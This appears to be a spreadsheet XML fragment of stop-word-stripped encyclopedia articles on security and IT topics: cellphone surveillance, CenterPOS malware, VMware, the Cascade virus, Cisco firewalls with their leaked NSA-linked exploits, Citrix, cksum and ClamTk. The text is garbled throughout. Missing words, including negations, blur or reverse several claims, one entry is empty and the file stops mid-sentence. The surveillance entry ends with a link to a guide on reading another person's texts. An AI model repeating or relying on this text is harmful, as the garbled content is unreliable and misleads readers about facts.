    <t>vpnbook service offering servers multiple countries. description service connects openvpn client pptp connection. there minimal variety geographic locations. available servers include united states, canada romania. vpnbook used bypass governmental restrictions. service connected ways, connection third-party openvpn client pptp. ios, android, ubuntu, windows operating systems pptp support built software (openvpn clients) used also, provides protocol stack, file system, process scheduling. openvpn uses protocol generally secure layer tunnel protocol's pptp. reception review done magazine, concluded service good choice among free services, even though certain functionality flaws. techradar reviewed vpnbook negatively, criticizing poor performance lack desktop mobile apps. also comparison virtual private network services references external links official website protonvpn overview torrents proxy website</t>
  </si>
  <si>
    <t>Cellphone surveillance</t>
  </si>
  <si>
    <t>cellphone surveillance (also known cellphone spying) involve tracking, bugging, monitoring, eavesdropping, recording conversations text messages mobile phones. also encompasses monitoring people's movements, tracked using mobile phone signals phones turned mass cellphone surveillance stingray devices stingray devices technology mimics cellphone tower, causing nearby cellphones connect pass data instead legitimate towers. this process invisible end-user allows device operator full access communicated data. this technology form man-in-the-middle attack.stingrays used enforcement agencies track people's movements, intercept record conversations, names, phone numbers text messages mobile phones. their entails monitoring collection data mobile phones within target area. enforcement agencies northern california purchased stingray devices include oakland police department, francisco police department, sacramento county sheriff's department, jose police department fremont police department. fremont police department's stingray device partnership oakland police department alameda county district attorney's office.end-to-end encryption signal protects traffic stingray devices cryptographic strategies. tower dumps tower dump sharing identifying information cell tower operator, used identify given individual certain time. mobile phone users move, devices connect nearby cell towers order maintain strong signal even phone actively use. these towers record identifying information cellphones connected used track individuals.in united states, police many kinds cellphone data without obtaining warrant. law-enforcement records show police initial data tower dump another court order information, including addresses, billing records logs calls, texts locations. targeted surveillance software vulnerabilities cellphone bugs created disabling ringing feature mobile phone, allowing caller call phone access microphone listening. example group facetime bug. united states, used "roving bugs", entails activation microphones mobile phones monitoring conversations. cellphone spying software cellphone spying software type cellphone bugging, tracking, monitoring software surreptitiously installed mobile phones. this software enable conversations heard recorded phones upon installed. cellphone spying software downloaded onto cellphones. cellphone spying software enables monitoring stalking target cellphone remote location following techniques: allowing remote observation target cellphone position real-time remotely enabling microphones capture forward conversations. microphones activated call phone standby capturing conversations near cellphone. receiving remote alerts and/or text messages time somebody dials number cellphone remotely reading text messages call logscellphone spying software enable microphones mobile phones phones used, installed mobile providers. bugging intentionally hiding cell phone location bugging technique. some hidden cellphone bugs rely wi-fi hotspots, rather cellular data, tracker rootkit software periodically "wakes signs public wi-fi hotspot upload tracker data onto public internet server. lawful interception governments sometimes legally monitor mobile phone communications procedure known lawful interception.in united states, government pays phone companies directly record collect cellular communications specified individuals. u.s. enforcement agencies also legally track movements people mobile phone signals upon obtaining court order real-time location data 2018, united states cellphone carriers sell customers' real-time location data at&amp;t, verizon, t-mobile, sprint- publicly stated would cease data sales found companies negligent protecting personal privacy customers' data. location aggregators, bounty hunters, others including enforcement agencies obtain search warrants used information. chairman ajit concluded carriers apparently violated federal law. however, 2019, carriers continuing sell real-time location data. late february 2020, seeking fines carriers case. occurrences 2005, prime minister greece advised his, dignitaries', mayor athens' mobile phones bugged. kostas tsalikidis, vodafone-panafon employee, implicated matter using position head company's network planning assist bugging. tsalikidis found hanged apartment leaders notified bugging, reported apparent suicide."security holes within signalling system (ss7), called common channel signalling system (ccss7) common channel interoffice signaling (ccis7) demonstrated chaos communication congress, hamburg 2014.during coronavirus pandemic israel authorized internal security service, shin bet, access historic cellphone metadata engage location tracking covid-19 carriers. detection some indications possible cellphone surveillance occurring include mobile phone waking unexpectedly, using battery power idle use, hearing clicking beeping sounds conversations occurring circuit board phone warm despite phone used. however, sophisticated surveillance methods completely invisible user able evade detection techniques currently employed security researchers ecosystem providers. prevention preventive measures cellphone surveillance include losing allowing strangers mobile phone utilization access password. another technique would turning phone also removing battery use. jamming faraday cage also work, latter obviating removal battery. another solution cellphone physical (electric) switch isolated electronic switch disconnects microphone camera without bypass, meaning switch operated user software connect back. also bluesnarfing carpenter united states carrier cellphone jammer cyber stalking mobile security telephone tapping vault voice activated recorders security switch references https://mfggang.com/read-messages/how-to-read-texts-from-another-phone/</t>
  </si>
  <si>
    <t>CenterPOS Malware</t>
  </si>
  <si>
    <t>centerpos (also known "cerebrus") point sale (pos) malware discovered cyber security experts. discovered september 2015 along kinds malware, newposthings, blackpos, alina. there versions released developer responsible: version version 2.0. centerpos similar functionality centerpos version 1.7. variant centerpos malware added effective features, addition configuration file storing information command control server. overview centerpos used target retailers order illegally obtain payment card information using memory scraper. uses distinct modes scrape store information: "smart scan" "normal scan". normal scan mode, malware looks processes device determines ones currently running processes, named "system", "system idle process" "idle", contain keywords microsoft mozilla. process meets criteria list, malware search memory regions within process, searching credit card data regular expressions regular expression list. smart scan mode, malware starts performing normal scan, process regular expression match added smart scan list. after first pass, malware search processes smart scan list. malware contains functionality allows cybercriminals create configuration file. process details centerpos malware searches configuration file contains information. unable find configuration file, asks password. password entered correct, payloads functions create configuration file. this malware different point sale system malware separate component called builder create payload.the centerpos malware looks credit debit card information smart scan mode encrypts scraped data using triple encryption. then memory scraped data sent operator malware separate http post request. also point-of-sale malware cyber security standards list cyber attack threat trends cyber electronic warfare malware references</t>
  </si>
  <si>
    <t>VMware</t>
  </si>
  <si>
    <t>vmware, inc. american cloud computing virtualization technology company headquarters palo alto, california. vmware first commercially successful company virtualize architecture.vmware's desktop software runs microsoft windows, linux, macos, enterprise software hypervisor servers, vmware esxi, bare-metal hypervisor runs directly server hardware without requiring additional underlying operating system.in 2022, broadcom inc. announced agreement acquire vmware cash-and-stock transaction valued billion. history early history 1998, vmware founded diane greene, mendel rosenblum, scott devine, ellen wang edouard bugnion. greene rosenblum graduate students university california, berkeley. edouard bugnion remained chief architect vmware 2005, went found nuova systems (now part cisco). first year, vmware operated stealth mode, roughly employees 1998. company launched officially early second year, february 1999, demo conference organized chris shipley. first product, vmware workstation, delivered 1999, company entered server market 2001 vmware server (hosted) vmware server (hostless).in 2003, vmware launched vmware virtual center, vmotion, virtual technology. 64-bit support introduced 2004. acquisition january 2004, terms definitive agreement announced december 2003, (now dell emc) acquired company $625 million cash. august 2007, sold vmware public initial public offering. shares priced us$29 share closed us$51.on july 2008, disappointing financial performance, board directors fired vmware co-founder, president diane greene, replaced paul maritz, retired 14-year microsoft veteran heading emc's cloud computing business unit. greene since company's founding, years earlier. september 2008, mendel rosenblum, company's co-founder, chief scientist, husband diane greene, resigned.on september 2008, vmware announced collaboration cisco systems. result cisco nexus 1000v, distributed virtual software switch, integrated option vmware infrastructure.in april 2011, transferred control mozy backup service vmware.on april 2011, vmware released open-source platform-as-a-service system called cloud foundry, well hosted version service. this supported application deployment java, ruby rails, sinatra, node.js, scala, well database support mysql, mongodb, redis, postgres, rabbitmq.in august 2012, gelsinger appointed vmware, coming emc. paul maritz went head strategy moving lead pivotal spin-off.in march 2013, vmware announced corporate spin-off pivotal software, general electric making investment company. vmware's application- developer-oriented products, including spring, server, cloud foundry, rabbitmq, gemfire, sqlfire transferred organization.in 2013, vmware launched iaas service, vcloud hybrid service, palo alto headquarters (vcloud hybrid service rebranded vcloud subsequently sold cloud provider ovh), announcing early access program vegas data center. service designed function extension customer's existing vsphere installations, full compatibility existing virtual machines virtualized vmware software tightly integrated networking. service based vcloud director 5.1/vsphere 5.1.in september 2013, vmworld francisco, vmware announced general availability vcloud hybrid service expansion sterling, virginia, santa clara, california, dallas, texas, service beta announced acquisition desktone october 2013. dell acquisition january 2016, anticipation dell's acquisition emc, vmware announced restructuring reduce positions, executives resigned. entire development team behind vmware workstation fusion disbanded developers immediately fired. april 2016, maintenance release 12.1.1 released. september 2016, vmware announced release workstation 12.5 fusion free upgrade supporting windows windows server 2016.in april 2016, vmware president carl eschenbach left vmware join sequoia capital, martin casado, vmware's general manager networking security business, left join andreessen horowitz. analysts commented cultures dell emc, vmware, different, said heard impending corporate cultural collisions potentially radical product overlap pruning, would cause many vmware personnel leave; vmware gelsinger, following rumors, categorically denied would leave.in august 2016 vmware introduced vmware cloud provider website.mozy transferred dell 2016 merger dell emc.in april 2017, according glassdoor, vmware ranked list highest paying companies united states.in 2017, vmware sold vcloud french cloud service provider ovh.on january 2021, vmware announced gelsinger would leaving step intel. intel gelsinger spent years career intel's first chief technology officer. zane rowe became interim board searched replacement. april 2021, reported dell would spin remaining stake vmware shareholders companies would continue operate without major changes least five years. spinoff completed november 2021.on 2021, vmware announced raghu raghuram would take ceo.in 2022, vmware announced company partnered formula motor racing team, mclaren racing. broadcom acquisition 2022 announced broadcom acquire vmware approximately billion cash stock addition assuming billion vmware's debt, broadcom software group would rebrand operate vmware. transaction expected close broadcom’s fiscal year 2023. log4shell vulnerability beginning january 2022, hackers infiltrated unpatched vmware servers using log4shell vulnerability according pcmag. zdnet would report march 2022 hackers utilized log4shell vmware servers install backdoors cryptocurrency mining. 2022, bleeping computer reported lazarus group cybercrime group, possibly linked north korea, actively using log4shell inject backdoors fetch information-stealing payloads vmware horizon servers", including vmware horizon. acquisitions litigation march 2015, software freedom conservancy announced funding litigation christoph hellwig hamburg, germany vmware alleged violation copyrights esxi product. hellwig's core claim esxi derivative work gplv2-licensed linux kernel 2.4, therefore vmware compliance gplv2 publish source code esxi. vmware publicly stated esxi derivative linux kernel, denying hellwig's core claim. vmware said offered linux device drivers esxi, code linux gplv2-licensed code published source, meeting gplv2 requirements.the lawsuit dismissed court july 2016 hellwig announced would file appeal. appeal decided february 2019 dismissed german court, basis meeting "procedural requirements burden proof plaintiff." current products vmware's notable products hypervisors. vmware became well known first type hypervisor known gsx. this product since evolved hypervisor product lines: vmware's type hypervisors running directly hardware hosted type hypervisors. vmware software provides completely virtualized hardware guest operating system. vmware software virtualizes hardware video adapter, network adapter, hard disk adapters. host provides pass-through drivers guest usb, serial, parallel devices. way, vmware virtual machines become highly portable computers, every host looks nearly identical guest. practice, system administrator pause operations virtual machine guest, move copy guest another physical computer, resume execution exactly point suspension. alternatively, enterprise servers, feature called vmotion allows migration operational guest virtual machines similar separate hardware hosts sharing storage (or, vmotion storage, separate storage used, too). each transitions completely transparent users virtual machine time migrated. vmware's products predate virtualization extensions instruction set, require virtualization-enabled processors. newer processors, hypervisor designed take advantage extensions. however, unlike many hypervisors, vmware still supports older processors. cases, uses code directly whenever possible (as, example, running user-mode virtual 8086 mode code x86). when direct execution cannot operate, kernel-level real-mode code, vmware products binary translation (bt) re-write code dynamically. translated code gets stored spare memory, typically address space, segmentation mechanisms protect make invisible. reasons, vmware operates dramatically faster emulators, running speed virtual guest operating system would directly hardware. study vmware claims slowdown native ranging percent vmware server. desktop software vmware workstation, introduced 1999, first product launched vmware. this software suite allows users multiple instances x86-64-compatible operating systems single physical personal computer. current version, 16.2.3, released march 2022. vmware fusion provides similar functionality users intel platform, along full compatibility virtual machines created vmware products. vmware workstation player freeware non-commercial use, without requiring license, available commercial permission. similar vmware workstation, reduced functionality, "uefi secure boot support". server software vmware esxi, enterprise software product, deliver greater performance freeware vmware server, lower system computational overhead. vmware esxi, "bare-metal" product, runs directly server hardware, allowing virtual servers also hardware less directly. addition, vmware esxi integrates vmware vcenter, offers extra services. cloud management software vmware vrealize suite cloud management platform purpose-built hybrid cloud. vmware web-based service guide users expertise level installation configuration vmware vsphere hypervisor. vmware cloud foundation cloud foundation provides easy deploy operate private cloud integrated sddc system. vmware horizon view virtual desktop infrastructure (vdi) product. vsphere+ vsan+ activates add-on hybrid cloud services business-critical applications running on-premises, including disaster recovery ransomware protection application management vmware workspace portal self-service store workspace management. storage availability vmware's storage availability products composed primary offerings: vmware vsan (previously called vmware virtual san) software-defined storage embedded vmware's esxi hypervisor. vsphere vsan software runs industry-standard servers form hyper-converged infrastructure hci). however, network operators need servers (hardware compatibility list) production. first release, version 5.5, released march 2014. generation, version 6.6, released april 2017. features available vmware vsan include native data rest encryption, local protection stretched clusters, analytics, optimized solid-state drive performance. vmware version released april 2018, users improved monitoring tools workflows, closer feature parity. vcenter server appliance architecture moving around easy deployment method. vmware site recovery manager (srm) automates failover failback virtual machines secondary site using policy-based management. networking security products vmware vmware's network virtualization product marketed using term software-defined data center (sddc). technology included acquired 2012 purchase nicira. software defined networking (sdn) allows policies govern identity access management (iam) dictate levels access applications data totally converged infrastructure possible legacy network system access methods. other products workspace allows mobile users access apps data. (virtual infrastructure extension) allows automated scripted management computer virtualized using either vmware's vsphere, workstation, player, fusion products. provides bindings programming languages perl, visual basic, vbscript herald communications protocol vmware reliable bluetooth communication range finding across mobile devices. herald code available open-source license implemented australian government's covidsafe contact tracing december 2020. also comparison platform virtualization software hardware virtualization hypervisor vmware vmfs references external links official website business data vmware:</t>
  </si>
  <si>
    <t>Cascade (computer virus)</t>
  </si>
  <si>
    <t>cascade virus (also known herbstlaub germany) prominent computer virus resident written assembly language, widespread 1980s early 1990s. infected .com files effect making text screen fall cascade) form heap bottom screen. notable using encryption algorithm avoid detected. however, could infected files size increased 1701 1704 bytes. response, developed antivirus software. virus number variants. cascade-17y4, reported originated yugoslavia, almost identical common 1704 byte variant. byte changed, probably random "mutation". this, however, resulted "bug" virus. another mutated variant also known infects file over. references f-secure computer virus information pages: cascade external links video cascade virus action (youtube)</t>
  </si>
  <si>
    <t>Utimaco Atalla</t>
  </si>
  <si>
    <t>utimaco atalla, founded atalla technovation formerly known atalla corporation atalla, security vendor, active market segments data security cryptography. atalla provides government-grade end-to-end products network security, hardware security modules (hsms) used automated teller machines (atms) internet security. company founded egyptian engineer mohamed atalla 1972. atalla hsms payment card industry's facto standard, protecting million card transactions daily (more billion transactions annually) 2013, securing majority world's transactions 2014. company history 1970s company originally founded 1972, initially atalla technovation, later called atalla corporation. company founded mohamed atalla, inventor mosfet (metal-oxide-semiconductor field-effect transistor). 1972, atalla filed u.s. patent 3,938,091 remote verification system, utilized encryption techniques assure telephone link security entering personal information, would transmitted encrypted data telecommunications networks remote location verification.he invented first hardware security module (hsm), dubbed "atalla box", security system encrypted messages, protected offline devices un-guessable pin-generating key. commercially released "atalla box" 1973. product released identikey. card reader customer identification system, providing terminal plastic card capabilities. system designed banks thrift institutions switch plastic card environment passbook program. identikey system consisted card reader console, customer pads, intelligent controller built-in electronic interface package. device consisted keypads, customer teller. allowed customer type secret code, transformed device, using microprocessor, another code teller. identikey system connected directly without hardware software changes, designed easy operation teller customer. during transaction, customer's account number read card reader. this process replaced manual entry avoided possible stroke errors. allowed users replace traditional customer verification methods signature verification test questions secure system.a innovation atalla block, required securely interchange symmetric keys pins actors banking industry. this secure interchange performed using atalla block (akb) format, lies root cryptographic block formats used within payment card industry data security standard (pci dss) american national standards institute (ansi) standards.fearful atalla would dominate market, banks credit card companies began working international standard. work atalla high security modules. verification process similar later 3624 system. atalla early competitor banking market, cited influence employees worked data encryption standard (des).at national association mutual savings banks (namsb) conference january 1976, atalla announced upgrade identikey system, called interchange identikey. added capabilities processing online transactions dealing network security. designed focus taking bank transactions online, identikey system extended shared-facility operations. consistent compatible various switching networks, capable resetting electronically 64,000 irreversible nonlinear algorithms directed card data information. interchange identikey device released march 1976. first products designed deal online transactions, along bunker ramo corporation products unveiled namsb conference. 1979, atalla introduced first network security processor (nsp). recognition work system information security management, atalla referred "father pin" father information security technology. 1980s–present merged 1987 tandem computers, acquired compaq 1997. atalla protected networks operation 1998, secured transactions worldwide 2006. 2001, acquired compaq. 2015, divided companies, atalla products assigned newly formed hewlett packard enterprise (hpe). september 2016, whitman announced software assets hewlett packard enterprise, including atalla, would spun merged micro focus create independent company enterprise shareholders would retain majority ownership. micro focus kevin loosemore called transaction "entirely consistent established acquisition strategy focus efficient management mature infrastructure products" indicated micro focus intended "bring core earnings margin mature assets deal percent total percent today micro focus's existing percent level within three years." merger concluded september 2017. 2018, utimaco, german producer hardware security modules, announced intent acquire atalla eskm (enterprise secure manager) business lines micro focus. venture received united states regulatory clearance october 2018.in february 2020, ultimaco acquired geobridge corporation. geobridge corporation woman-owned technology company providing compliance services integration systems, development management programs, consultancy payments industry architecture implementation cryptographic solutions. this acquisition expand utimaco financial sector management portfolio. product overview atalla multi-chip embedded cryptographic module, consists hardware platform, firmware secure loader, firmware. purpose module load approved application programs, also referred personalities, securely. firmware monitors physical security cryptographic module. verification module approved observed.the atalla security policy addresses hardware firmware secure loader. this approach creates security platform able load secure code. once control passes loader, module longer operating fips mode. note: personality access module's secret keys. cryptographic boundary fips 140-2 level validation outer perimeter secure metal enclosure encompasses critical security components. references external links official website</t>
  </si>
  <si>
    <t>Utilite</t>
  </si>
  <si>
    <t>utilite small, fanless nettop computer manufactured israeli company compulab. announced july 2013 based upon freescale i.mx6 soc. available utilite value, utilite standard utilite models.the utilite delivered with: ubuntu 12.04 (soft-float armel version) pre-installed.other available operating systems: android arch linux (hard-float armhf version) gentoo linux source based distribution kali linux (armhf debian based focused security testing)there exists also three linux based operating systems specialized media playback: xbmc geexbox volumio (armhf debian based)both bootloader (u-boot) kernel open source found gitorious github. also industrial references external links official website user guide technical reference manual arch linux kali linux xbmc geexbox volumio overview based linux devices gitorious github kernel documentation</t>
  </si>
  <si>
    <t>Charles Proxy</t>
  </si>
  <si>
    <t>charles debugging proxy cross-platform http debugging proxy server application written java. enables user view http, https, http/2 enabled port traffic accessed from, local computer. this includes requests responses including http headers metadata (e.g. cookies, caching encoding information) functionality targeted assisting developers analyze connections messaging. features network message analysis charles shows full messaging sources http similar tcp-based communications pass proxy port. xml, json, soap interpretation structured viewers translate http content tree format analysis. html, css, javascript viewers providing marked-up/formatted/unminified text content display debugging allowing decryption encrypted data review/troubleshoot transmitted content. bandwidth throttling simulate slower internet speeds slowing bandwidth/speed introducing latency, example simulate slower connection. flash development aids including action message format (amf) content analysis. debugging http connections mobile devices providing proxy android device remote site, debug http connections behavior occur devices, including debugging video streaming issues, airplay issues, etc. cannot tested simulator. remote file debugging ability swap remote file local file debugging remote site without requiring access server files. debugging aids repeating post requests test server changes, adding breakpoints, editing request variables. validation function ability right-click proxy request, provide validation feedback using markup validation service, useful content service otherwise cannot access directly. browser support charles autoconfigure following browsers: (windows system proxy settings) chrome firefox safari (mac windows system proxy settings) also packet analyzer fiddler (software) references external links official website</t>
  </si>
  <si>
    <t>Cisco ASA</t>
  </si>
  <si>
    <t>computer networking, cisco 5500 series adaptive security appliances, simply cisco asa, cisco's line network security devices introduced 2005, succeeded three existing lines popular cisco products: cisco pix, provided firewall network address translation (nat) functions ended sale july 2008. cisco 4200 series, worked intrusion prevention systems (ips). cisco 3000 series concentrators, provided virtual private networking (vpn).the cisco unified threat management device, combining several network security functions box. reception criticism cisco become widely used firewall/vpn solutions small medium businesses. early reviews indicated cisco tools managing device lacking.a security flaw identified users customized clientless option asa's rectified 2015. another flaw webvpn feature fixed 2018.in 2017 shadow brokers revealed existence privilege escalation exploits called epicbanana extrabacon. code insertion implant called bananaglee, made persistent jetplow. features 5506w-x wifi point included. architecture software based linux. runs single executable linkable format program called lina. this schedules processes internally rather using linux facilities. boot sequence boot loader called rommon (rom monitor) starts, loads linux kernel, loads lina_monitor, loads lina. rommon also command line used load select software images configurations. names firmware files includes version indicator, -smp means symmetrical multiprocessor (and architecture), different parts also indicate 3des supported not.the software similar interface cisco software routers. there command line interface (cli) used query operate configure device. config mode configuration statements entered. configuration initially memory running-config would normally saved flash memory. options 5512-x, 5515-x, 5525-x, 5545-x 5555-x extra interface card added.the 5585-x options ssp. stands security services processor. these range processing power factor ssp-10 ssp-20, ssp-40 ssp-60. 5585-x slot module. this slot subdivided half width modules.on models, features limited, uncrippling happens installation security plus license. this enables vlans, peers, also high availability. cisco anyconnect extra licensable feature operates ipsec tunnels clients pcs, iphones ipads. models 5505 introduced 2010 desktop unit designed small enterprises branch offices. included features reduce need equipment, inbuilt switch, power ethernet ports. 5585-x higher powered unit datacenters introduced 2010. runs mode intel architecture atom chip. cisco determined devices little capacity include features needed, anti-virus, sandboxing, introduced line called next generation firewall. these mode.models 2018. references external links cisco 5500 series adaptive security appliances cisco security podcast troubleshooting information</t>
  </si>
  <si>
    <t>Cisco PIX</t>
  </si>
  <si>
    <t>cisco (private internet exchange) popular firewall network address translation (nat) appliance. first products market segment. 2005, cisco introduced newer cisco adaptive security appliance (cisco asa), inherited many features, 2008 announced end-of-sale. technology sold blade, firewall services module (fwsm), cisco catalyst 6500 switch series 7600 router series, reached support status september 2007. history originally conceived early 1994 john mayes redwood city, california designed coded brantley coile athens, georgia. name derived creators' creating functional equivalent solve then-emerging registered address shortage. time investigated viable approach, wanted conceal block blocks addresses behind single multiple registered addresses, much pbxs internal phone extensions. when began, 1597 1631 discussed, now-familiar 1918 submitted. design, testing carried 1994 john mayes, brantley coile johnson network translation, inc., brantley coile sole software developer. beta testing serial number 000000 completed first customer acceptance december 1994 instruments jose, california. quickly became leading enterprise firewall products awarded data communications magazine "hot product year" award january 1995.shortly cisco acquired network translation november 1995, mayes coile hired longtime associates, richard (chip) howes pete tenereillo, shortly acquisition longtime associates, jordan bohannon. together continued development finesse original version cisco firewall, known "classic". during time, shared code another cisco product, localdirector. january 2008, cisco announced end-of-sale end-of-life dates cisco security appliances, software, accessories, licenses. last purchasing cisco security appliance platforms bundles july 2008. last purchase accessories licenses january 2009. cisco ended support cisco security appliance customers july 2013.in 2005, cisco introduced combines functionality pix, 3000 series product lines. series devices code later. through release software images. beginning version 8.x, operating system code diverges, using linux kernel continuing traditional finesse/pix combination. software runs custom-written proprietary operating system originally called finese (fast internet service executive), 2014 software known simply though classified network-layer firewall stateful inspection, technically would precisely called layer transport layer firewall, access restricted network layer routing, socket-based connections port address: port communications occur layer default allows internal connections (outbound traffic), allows inbound traffic response valid request allowed access control list (acl) conduit. administrators configure perform many functions including network address translation (nat) port address translation (pat), well serving virtual private network (vpn) endpoint appliance. became first commercially available firewall product introduce protocol specific filtering introduction "fixup" command. "fixup" capability allows firewall apply additional security policies connections identified using specific protocols. protocols specific fixup behaviors developed include smtp. fixup originally implemented simple effective security policy; allowed response server internet (known outside interface) request client protected (known inside) interface. "inspect" superseded "fixup" later versions cisco also first commercially available security appliances incorporate ipsec gateway functionality. administrators manage command line interface (cli) graphical user interface (gui). they access serial console, telnet ssh. administration originated version 4.1, several incarnations: firewall manager (pfm) versions 5.x, runs locally windows client device manager (pdm) version 6.x, runs https requires java adaptive security device manager (asdm) version greater, locally client reduced-functionality mode https.because cisco acquired network translation, originally align cisco syntax. starting version 7.0, configuration became much ios-like. hardware original classic cases sourced provider appro. flash cards early encryption acceleration cards, pix-pl pix-pl2, sourced productivity enhancement products (pep). later models cases cisco manufacturers. constructed using intel-based/intel-compatible motherboards; used am5x86 processor, standalone models used intel 80486 pentium processors. boots proprietary flash memory daughtercard case pix, classic, 10000, 510, 520, 535, boots integrated flash memory case 501, 506/506e, 515/515e, 525, ws-svc-fwm-1-k9. latter part code technology implemented fire wall services module, catalyst 6500 7600 router. adaptive security appliance (asa) adaptive security appliance network firewall made cisco. introduced 2005 replace cisco line. along stateful firewall functionality another focus virtual private network (vpn) functionality. also features intrusion prevention voice 5500 series followed 5500-x series. 5500-x series focuses virtualization hardware acceleration security modules. history 2005 cisco released 5510, 5520, 5540 models. software continues using codebase but, software transitioned major version 8.x, moved finesse/pix operating system platform linux operating system platform. also integrates features cisco 4200 intrusion prevention system, cisco 3000 concentrator. hardware continues lineage intel 80x86 hardware. security vulnerabilities cisco product hacked nsa-tied group equation group somewhere 2016. equation group developed tool code-named benigncertain reveals pre-shared password(s) attacker (cve-2016-6415). equation group later hacked another group called shadow brokers, published exploit publicly, among others. according technica, likely used vulnerability wiretap vpn-connections decade, citing snowden leaks.the cisco asa-brand also hacked equation group. vulnerability requires snmp accessible attacker. codename given exploit extrabacon. exploit (cve-2016-6366) also leaked shadowbrokers, batch exploits backdoors. according technica, exploit easily made work modern versions cisco leaked exploit handle.on 29th january 2018 security problem cisco asa-brand disclosed cedric halbronn group. free-bug secure sockets layer (ssl) functionality cisco adaptive security appliance (asa) software could allow unauthenticated remote attacker cause reload affected system remotely execute code. listed cve-2018-0101. also cisco localdirector references</t>
  </si>
  <si>
    <t>Cisco Systems VPN Client</t>
  </si>
  <si>
    <t>cisco systems client software application connecting virtual private networks based internet exchange version july 2011, cisco announced life product. product updates released july 2012, support ceased july 2014. support page documentation links taken july 2016, replaced obsolete status notification. availability compatibility software free often installed university business computers accordance site-license. corporate licenses, administrators allowed freely distribute software users within network. open-source vpnc client connect vpns supported official client. client 4.9.01.0230 beta added support 10.6. stable version 4.9.01.0180 appears lack support; 4.9.00.0050 explicitly support versions later 10.5.vpn client 5.0.07.0290 added support 64-bit versions windows vista windows security client uses profile configuration files (.pcf) store passwords either hashed type stored plaintext. vulnerability identified, passwords easily decoded using software online services. work around issues, network administrators advised mutual group authentication feature, unique passwords (that related important network passwords). also cisco asa, product line replaced cisco concentrator server side references</t>
  </si>
  <si>
    <t>Unraid</t>
  </si>
  <si>
    <t>unraid proprietary linux-based operating system designed home media server setups operates network-attached storage device, application server, virtualization host. unraid proprietary software developed maintained lime technology, inc. users software encouraged write plugins docker applications extend functionality systems. features unraid's primary feature ability easily create manage raid arrays hardware-agnostic ways, allowing users nearly combination hard drives create array, regardless model, capacity, connection type. since unraid saves data individual drives rather spreading single files multiple drives, users create shares, groups files written multiple drives determined user system) allow easy access management users.unraid also allows users create docker containers virtual machines host applications system. example, user could pre-made docker container host applications plex, jellyfin, others.unraid's user license attached specific flash drive, linked user's forum account. references</t>
  </si>
  <si>
    <t>Citrix Virtual Apps</t>
  </si>
  <si>
    <t>citrix virtual apps (formerly winframe, metaframe, presentation server xenapp) application virtualization software produced citrix systems allows windows applications accessed individual devices shared server cloud system. product overview citrix virtual apps application virtualization software delivers centrally-hosted windows applications local devices without necessity installing them. flagship product citrix formerly known names winframe, metaframe, presentation server.citrix virtual apps software uses flexcast management architecture (fma), proprietary architecture citrix virtualization products. delivers individual applications, opposed entire desktops, devices. also used citrix workspace deliver apps part complete virtual desktop environment.with citrix virtual apps, windows applications used devices typically could them, including macintosh computers, mobile devices, google chromebooks, linux computers. conversely, enables otherwise incompatible apps windows desktops.citrix virtual apps accessed devices citrix receiver. software delivered on-premises data centers public, private, hybrid clouds. history precursor virtual apps called winframe, multi-user operating system based windows 3.51. released 1995, winframe first products distributed citrix. stage product development citrix systems licensed windows 3.51 base operating system microsoft. core development citrix delivered multiwin engine. this allowed multiple users logon execute applications winframe server. citrix later license multiwin technology microsoft, forming basis microsoft's terminal services. repackaged versions windows citrix winframe client included, also available citrix. metaframe superseded winframe 1998. product renamed several times: became metaframe 2002, metaframe presentation server 2003, rebranded presentation server 2005. each products focused remote access applications server-based computing.in 2008, product renamed xenapp. "xen" taken company's acquisition xensource 2007.between 2010 2012, citrix issued updates xenapp. xenapp launched 2010 included central management console called appcenter. 2012, xenapp released update included feature called instant access, aimed reduce application launch time.in 2013, version released. this update combined xendesktop xenapp application called xendesktop flex management architecture (fma). prior this, versions xenapp used company's independent management architecture (ima). 2014, version released xenapp, separate xendesktop, also built fma.in 2018, xenapp rebranded citrix virtual apps.in 2022, citrix virtual apps rebranded citrix daas. external links official website references</t>
  </si>
  <si>
    <t>Cksum</t>
  </si>
  <si>
    <t>cksum command unix unix-like operating systems generates checksum value file stream data. cksum command reads file given arguments, standard input arguments provided, outputs file's 32-bit cyclic redundancy check (crc) checksum byte count. output cksum different crc-32 used zip, zlib.the cksum command used verify files transferred unreliable means arrived intact. however, checksum calculated cksum command cryptographically secure: while guards accidental corruption unlikely corrupted data checksum intended data), difficult attacker deliberately corrupt file specific checksum unchanged. unix-like systems typically include commands cryptographically secure checksums, sha256sum. command available separate package microsoft windows part unxutils collection native win32 ports common unix-like utilities.latest coreutils cksum provides additional checksum algorithms option, extension beyond posix. interoperability standard cksum command, found unix-like operating systems (including linux, *bsd, macos, solaris) uses algorithm based ethernet standard frame check therefore interoperable implementations. this contrast command, interoperable compatible crc-32 calculation. tru64 operating systems, cksum command returns different value, unless environment variable cmd_env xpg4. algorithm cksum uses generator polynomial 0x04c11db7 appends message length little endian representation. that length null bytes trimmed right end. syntax usage example 4038471504 represents checksum value represents file size test.txt. also cyclic redundancy check core utilities md5sum references external links cksum shell utilities reference, single unix specification, version open group cksum core utilities cksum(1) freebsd general commands manual cksum(1) linux user manual user commands</t>
  </si>
  <si>
    <t>Clam AntiVirus</t>
  </si>
  <si>
    <t>ClamTk</t>
  </si>
  <si>
    <t>clamtk free software graphical interface clamav command line antivirus software program, linux desktop users. provides on-demand scheduled scanning. project started dave mauroni february 2004 remains development.clamtk originally written using widget toolkit, named, later re-written perl, using toolkit. interface evolved considerably time recent versions quite different early releases, adding features changing interface presentation. dual-licensed general public license version later, artistic license. features clamtk interface allows scanning single files directories. configured recursive scans, scanning sub-directories, whitelists, scan potentially unwanted applications (puas), exclude hidden files, large files 2017 ghacks reviewer mike turcotte-mccusker noted high rate false positives pua-inclusive scans return.the history selection allows reviewing results previous scans quarantined files. clamtk allows manual automatic updates configured clamav's virus definitions.the application interfaces thunar-sendto-clamtk, nemo-sendto-clamtk, clamtk-gnome clamtk-kde, provide context menu functionality associated file managers, thunar, nemo, gnome files dolphin, allowing users directly send files clamtk scanning.clamtk also command-line interface, although main reason command line access exists interface various file managers. clamtk included repositories many linux distributions, including linux, arch linux, centos, debian, fedora, gentoo, linux mint, mandriva, opensuse, pclinuxos, enterprise linux, ubuntu, well freebsd.most users install clamtk repositories linux distribution using, application's website also provides downloads latest release versions, form .rpm .deb files. reception 2014 review clamtk 5.0.7 silviu stahie softpedia recommended application means getting clamav functionality easy-to-use graphical interface. wrote, "basically, functions clamtk performed terminal clamav. that would fine desktop environment, like server, reason terminal regular linux distribution."a 2015 review bill toulas forge noted clamtk seemed take comparable amount time scan clamav, indicting slowing scanning engine down.a 2017 review linux ubuntu said, "clamtk provides simple allows beginners comfortable cli. upon launching clamtk, presented clean main sections."in ubuntu pit's listing best linux antivirus: 